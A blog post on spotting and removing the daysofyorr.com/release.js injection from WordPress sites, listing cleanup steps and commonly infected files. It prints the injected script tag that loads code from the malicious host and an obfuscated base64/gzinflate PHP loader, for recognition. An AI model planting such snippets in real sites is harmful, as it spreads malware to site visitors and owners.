Remove Virus daysofyorr.com/release.js
On the evening of 30.08.2012, I was online on my facebook account, and one of my friend reported me about the malware attack on his website, so for the time being I gave him a solution which was not permanent, but yes can protect his site to great extent, so in order to grab more details on this I was just browsing over the internet to find the reasons behind the malware attack, how they are caused, what are main things responsible for them to cause and most importantly how it can be prevented.
And I found many things on this topic, and I’m gonna share them all with you guys, starting from very first thing….
daysofyorr.com/release.js
This is the one of the massive attack on WordPress blogs. This is a malicious JavaScript code which is set in all files. Apparently it is a Trojan: daysofyorr.com/release.js (remember it is not a website URL).
In this, passwords are read out by the malware and malicious code is disseminated among other things in WordPress blogs. And also in other content management, code was sighted already in the systems, forums, and various other Web tools.
Whether your blog is affected or not, you can easily check this by looking for the below code in the page source of your webpage:
” < script type = "text / javascript" src="http://www.daysofyorr.com/release.js" > < / script > < script type = "text / javascript" src="http://www.daysofyorr.com/release.js" > < / script >”
If you find the above code in any of your page, then the virus was injected in your website. But don’t panic you can fix the whole thing right, with some efforts, hopefully before the search engines classify yout site as dangerous.
Follow the steps below:
- Check files and direcotries You must check all the files in all major and sub-diretories of your blog for such code. The best way to locate files is by checking the last update date and time of the file.
- Remove the malicious code: If you have the knowledge of wordpress and programing language such as php, javascript, then locating the malicious code will be very easy for you, but even then I’m giving the malicious code which I found over the internet, as all malicious codes are almost same, so it will be a bit easy for you to find such..
#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#
- Check Your Source Again: Once you have removed all the malicious code, go back to the main page of your blog and again look at the source code. If you find no malicious code in the pages, the you have succeeded. But still, you have to search thorough out the directories for the malicious code.
- Make virus scan: update your virus scanner to the latest release and perform a full pc scan, to remove any local vulnerabilities.
- Change all passwords: As no password in secure, so make it a habit to change your passwords after every time interval, this would provide a better protection against the attacks. Changing password doesn’t only includes password of WordPress, I’m talking about the passwords of each and everything, such as your Google account, social networking accounts, FeedBurner, databases. And of cource everything else such as PayPal, online banking, email etc.
Note: Check the whole file for such codes, because it can be even placed at many palces in a single file.
Below are some files that are mostly attacked by the hackers.
/wp-login.php
/wp-blog-header.php
/index.php
/wp-admin/menu-header.php
/wp-admin/index.php
/wp-admin/custom-header.php
/wp-admin/admin-header.php
/wp-admin/admin-footer.php
/wp-admin/network/index.php
/wp-content/index.php
/wp-content/plugins/index.php
/wp-content/themes/index.php
/wp-content/themes/deintheme/header.php
/wp-content/themes/deintheme/footer.php
If you are using framework such as Genesis, Standard2, Thesis, don’t forget to check the framework root directory.
If present, also check the log directories of your hosting provider after the malicious code attack:
/usage
/logs
If your are using caching,(whether on hosting or as a WordPress plugin), don’t forget to delete all cached content.
